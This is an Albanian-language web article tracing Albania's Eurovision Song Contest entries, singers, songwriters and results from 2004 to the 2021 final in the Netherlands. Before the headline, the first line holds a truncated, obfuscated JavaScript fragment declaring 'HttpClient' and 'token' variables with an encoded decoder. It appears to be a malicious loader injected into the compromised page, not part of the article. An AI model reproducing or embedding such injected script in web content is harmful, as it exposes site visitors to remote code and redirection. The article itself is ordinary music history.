;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Eurovision-i dhe performancat e Shqipërisë ndër vite!

By

Eurovision Song Contest 2021 është edicioni i 65-të me radhë, i cili kësaj radhe po mbahet në Holandë. Garë kjo që arrin të grumbullojë rreth 200 milionë shikues për çdo vit nga e gjithë bota. Kësaj here, finaliste është edhe Shqipëria.

Prezantimi i parë i Shqipërisë në ‘Eurovision Song Contest’ u mirëprit nga publiku. Këngëtarja e parë që dërgoi ngjyrat kuq e zi ishte Anjeza Shahini.

Këngëtarja këndoi këngën ‘The Image of You’ të komponuar nga Edmond Zhulali me tekst të Agim Doçit.

Në natën gjysmë-finale, Shahini u radhit e katërta teksa në finale zuri pozitën e shtatë.

Pas Anjezës, në Eurovision na përfaqësoi Ledina Çelo. Kënga e dytë e shtetit Shqiptar në skenën europiane ishte ‘Tomorrow I go’ me kompozitor Adi Hila e teksta nga Pandi Laço.

Pjesëmarrja e dytë e jona u radhit në vendin e 16-të në finale.

Zhgënjimi i parë i vendit të Shqiponjave erdhi në vitin e tretë të konkurimit. Kënga ‘Zjarr e ftohtë’ e cila u këndua nga Luiz Ejlli nuk arriti të kualifikohet në finale.

Madje kënga e kompozuar nga Klodian Qafoku me tekst të Florian Kondit nuk u votua as në gjysmë finale duke u radhitur e 14-ta.

Edhe në vitin pas ardhës Shqipërinë e përcolli i njëjti fat. Bashkëpuntorët e Ledinës, Adi Hila dhe Pandi Laço krijuan këngën për Frederik Ndocin por që ‘Hear my plea’ nuk ishte adekuate.

Ky produkt muzikor nuk kaloi në finalen e vitit 2007.

Në vitin 2008, Shqiptarët i përfaqëson Olta Boka e cila atë kohë ishte vetëm 16 vjeç. Me këngën ‘Zemrën e lamë peng’ u kthyen në lojë Adi Hila dhe Pandi Laço të cilët sërish kishin punuar në prezantimin e kombit tonë.

Kjo këngë u këndua në shqip në Beograd dhe zuri vendin e 17-të.

Jo vetëm moshën por edhe fatin e njëjtë pati edhe Kejsi Tola. Këngëtarja na përfaqësoi në vitin 2009 me krijimin muzikor ‘Carry me in your dreams’.

Në këtë produkt muzikor u rikthyen krijuesit e këngës së parë të Shqipërisë në ‘Eurosong’, Edmond Zhulali dhe Agim Doçi.

Në finale Kejsi zuri vendin e 17-të.

Një pozitë më lart zuri Shqipëria në vitin pasardhës. E përfaqësuar nga Juliana Pasha me kompozitor Ardit Gjebrenë dhe tekst nga Arditi dhe Pirro Çako, kombi shqiptar preu biletën drejt finales.

‘It’s all about you’ rrëmbeu 62 pikë dhe zurin vendin e 16-të.

Shpëtim Saraçi komponoi këngën e Shqipërisë në Eurovision 2011 ndërsa tekstin e shkroi Sokol Marsi. Kjo dyshe e kombinuar me zërin e fuqishëm të Aurela Gaçes krijuan këngën ‘Feel my passion’.

Mirëpo këtë pasion nuk e ndjeu Europa, të cilët nuk i dhanë Shqipërisë të drejtën për të kënduar në finale.

Natën e madhe të finales, Shqipëria e shijon në vitin 2012 dhe për të parën herë me një prodhim muzikor nga Kosova.

Rona Nishliu e cila shkroi tekstin e këngës së saj të kompozuar nga Florent Boshnjaku i dhuroi Shqipërisë rezultatin më të lartë në këtë garë të muzikës europiane.

‘Suus’ u radhit e 5-ta në finale.

Nga ky prezantim për dy vite me radhë, nuk e shijuam më finalen.

Në vitin 2013 ‘Identitet’ kënduar nga Bledar Sejko dhe Ardian Lulgjuraj nuk e fitoi biletën për të kënduar në finale.

Ky prezantim ishte produkt muzikor i Bledar Sejkos e teksti nga Eda Sejko.

Pas dyshes, në Eurovisionin e vitit 2014 Shqipëria u përfaqësua nga Hersi Matmuja me këngën ‘One night’s anger’.

Kompozimi i Gentian Lakos me poezi të Jorgo Papingjit nuk solli shije të natës së madhe.

 

Kënga përfaqësuese e vitit 2015 “I’m alive” aso kohe i kishte rrëmbyer zemrat e shqiptarëve. Por Elhaida Dani si duket i zhgënjeu të gjithë me paraqitjen Live, pasi askush nuk e kishte pritur që zëri i saj të kishte luhatje vokale gjatë peformancës e veçanërisht nga një këngëtare e cila kishte fituar garën e “The Voice” në Itali.

E, edhe atë vit Shqipëria u radhitë e 17-ta me vetëm 34 pikë.

“Fairytale” nga Eneda Tarifa, ishte përfaqësuesja e vitit 2016, e cila nuk është pritur aspak mirë në versionin e saj në gjuhën angleze.

Ndonëse u vlerësua nga kritika dhe profesionistët për vokalin e saj, Eneda nuk arriti ta dërgojë në finale vendin e saj.

Më 2017, Lindita Halimi u zgjodh për të prezantuar vendin me këngën “World”. Kënga mori votat e mjaftushme, duke performuar vetëm në gjysmëfinale.

Shqipëria u përfaqësua në vitin 2018 nga Eugent Bushpepa, për të 15-tën herë në këtë kompeticion. Bushpepa arriti të kalojë në finalen e kësaj gare dhe zuri vendin e 11-të.

Një vit më vonë, këngëtarja shqiptare Jonida Maliqi mbushi skenën e “Eurovizion 2019” në Tel Aviv të Izraelit duke kaluar në finalen e Eurosong.

“Ktheju Tokës” me të cilën ajo fitoi Festivalin e 57-të të Shqipërisë arriti të mblidhte 90 pikë në finale e përsëri u radhitë e 17-ta.

E me fillimin e pandemisë më 2020 nuk dihej për fatin e Eurosong-ut. Përfaqësuese e Shqipërisë për këtë vit ishte Arilena Ara me këngën “Fall from the Sky”. Gjithsesi Eurovisoni i cili do të mbahej në Holandë u anulua për shkak të virusit COVID-19.

E ky rrugëtim na sjellë në Eurosong 2021, garë e cila është duke u mbajtur tani në shtëpinë nikoqire, Holandë. Kësaj radhe Shqipërinë po e prezanton Anxhela Peristeri me këngën “Karma” me të cilën do ta perfomojë sot në finale.

Artikuj të ngjashëm